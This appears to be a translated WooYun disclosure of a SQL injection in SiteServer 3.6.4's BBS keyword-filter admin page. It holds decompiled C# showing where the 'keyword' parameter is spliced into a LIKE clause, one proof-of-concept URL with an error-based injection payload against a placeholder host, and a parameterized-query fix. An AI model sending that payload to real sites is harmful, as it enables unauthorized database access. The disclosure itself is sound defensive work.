WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2013-11-22: Details sent to the vendor, awaiting vendor handling
2013-11-25: Vendor confirmed; details visible to the vendor only
2013-11-28: Details opened to third-party security partners
2014-01-19: Details disclosed to core white hats and relevant domain experts
2014-01-29: Details disclosed to regular white hats
2014-02-08: Details disclosed to intern white hats
2014-02-20: Details disclosed to the public
siteserver latest version 3.6.4 has an injection (injection number four)
The third injection is in /siteserver/bbs/background_keywordsFilting.aspx. Decompiling SiteServer.BBS.dll with .NET Reflector gives the following page code:
```csharp
// Page_Load fragment of background_keywordsFilting.aspx as recovered by .NET Reflector.
// The decompiler's dead goto / uint branches are straightened out; behaviour is unchanged.
this.spContents.ItemsPerPage = 20;
this.spContents.ConnectionString = DataProvider.ConnectionString;
// All three query-string values flow into the SQL builder; grade and categoryid are
// converted to integers, but keyword is handed over as a raw string.
this.spContents.SelectCommand = DataProvider.KeywordsFilterDAO.GetSelectCommend(
    ConvertHelper.GetInteger(base.Request.QueryString["grade"]),
    ConvertHelper.GetInteger(base.Request.QueryString["categoryid"]),
    ConvertHelper.GetString(base.Request.QueryString["keyword"]));
this.spContents.SortField = "Taxis";
this.spContents.SortMode = SortMode.ASC;
this.btnDelAll.Attributes.Add("onclick", "return checkstate('myform','删除');");
isPostBack = base.Request.QueryString["Delete"] == null;
```
The parameter of interest above is keyword. The DAO method it reaches:
```csharp
// KeywordsFilterDAO.GetSelectCommend as recovered by .NET Reflector. The decompiler's
// goto / uint.MaxValue control flow is linearized; the query it builds is identical.
public string GetSelectCommend(int grade, int categoryid, string keyword)
{
    StringBuilder builder = new StringBuilder();
    builder.Append("SELECT * FROM bbs_KeywordsFilter WHERE CategoryID !=0 ");
    if (grade != 0)
    {
        builder.Append(" AND Grade=" + grade);
    }
    if (categoryid != 0)
    {
        builder.Append(" AND CategoryID=" + categoryid);
    }
    if (!string.IsNullOrEmpty(keyword))
    {
        // keyword is concatenated straight into the LIKE pattern with no quoting
        // or parameterization: this is the injection point.
        builder.Append(" AND Name like '%" + keyword + "%'");
    }
    builder.Append(" ORDER BY Taxis DESC");
    return builder.ToString();
}
```
Clearly this leads to SQL injection:
http://www.target.com/siteserver/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test'%20and%20@@version=1%20and%202='1
Vendor site: on the official site the database raises an error, "Invalid object name 'bbs_KeywordsFilter'", but on a real deployment it is exploitable.
Filter the keyword parameter.
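The durable fix is to stop concatenating keyword into the SQL text at all. As an added example that is not SiteServer's own code, the same SELECT built with SqlParameter values over System.Data.SqlClient; the class, method and helper names are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text;

public static class KeywordsFilterQuery
{
    // Escape LIKE metacharacters so a user-supplied keyword matches literally.
    // '[' is handled first so the brackets added afterwards are not re-escaped.
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Same filter logic as GetSelectCommend, but every user value is a parameter.
    public static SqlCommand Build(SqlConnection conn, int grade, int categoryid, string keyword)
    {
        var sql = new StringBuilder("SELECT * FROM bbs_KeywordsFilter WHERE CategoryID != 0");
        var cmd = new SqlCommand { Connection = conn };

        if (grade != 0)
        {
            sql.Append(" AND Grade = @grade");
            cmd.Parameters.Add("@grade", SqlDbType.Int).Value = grade;
        }
        if (categoryid != 0)
        {
            sql.Append(" AND CategoryID = @categoryid");
            cmd.Parameters.Add("@categoryid", SqlDbType.Int).Value = categoryid;
        }
        if (!string.IsNullOrEmpty(keyword))
        {
            // The wildcards are wrapped around the parameter value, not spliced into
            // the SQL text, so a keyword such as  test' and @@version=1 and 2='1
            // is only ever compared as data and never parsed as SQL.
            sql.Append(" AND Name LIKE @keyword");
            cmd.Parameters.Add("@keyword", SqlDbType.NVarChar, 255).Value =
                "%" + EscapeLike(keyword) + "%";
        }
        sql.Append(" ORDER BY Taxis DESC");
        cmd.CommandText = sql.ToString();
        return cmd;
    }
}
```

The integer arguments were already safe because of ConvertHelper.GetInteger; parameterizing them too keeps the builder uniform and removes the temptation to concatenate the next field that is added.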
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2013-11-25 09:28
Thanks for the heads-up.
None yet.